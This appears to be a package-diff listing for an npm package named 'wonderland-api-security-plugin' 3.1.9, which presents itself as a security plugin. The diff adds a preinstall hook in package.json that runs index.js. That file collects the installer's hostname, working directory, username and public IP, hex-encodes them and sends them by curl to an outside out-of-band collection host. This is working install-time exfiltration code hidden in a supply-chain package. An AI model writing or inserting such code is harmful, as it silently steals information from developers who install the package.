wonderland-api-security-plugin 3.1.9
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +4 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1,4 @@
|
|
1
|
+
const { exec } = require("child_process");
|
2
|
+
const urlencode = (str) => encodeURIComponent(str);
|
3
|
+
exec(a=$(hostname;pwd;whoami;echo 'wonderland-api-security-plugin';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do curl -k -i -s 'https://idelgadbalszyhuzapqz3c0losxfzdvwi.oast.fun/?data='$ut;done, (error, data, getter) => {
|
4
|
+
if(error){ console.log("error",error.message); return; } if(getter){ console.log(data); return; } console.log(data); });
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "wonderland-api-security-plugin",
|
3
|
+
"version": "3.1.9",
|
4
|
+
"description": "Hackerone White Har Researcher",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|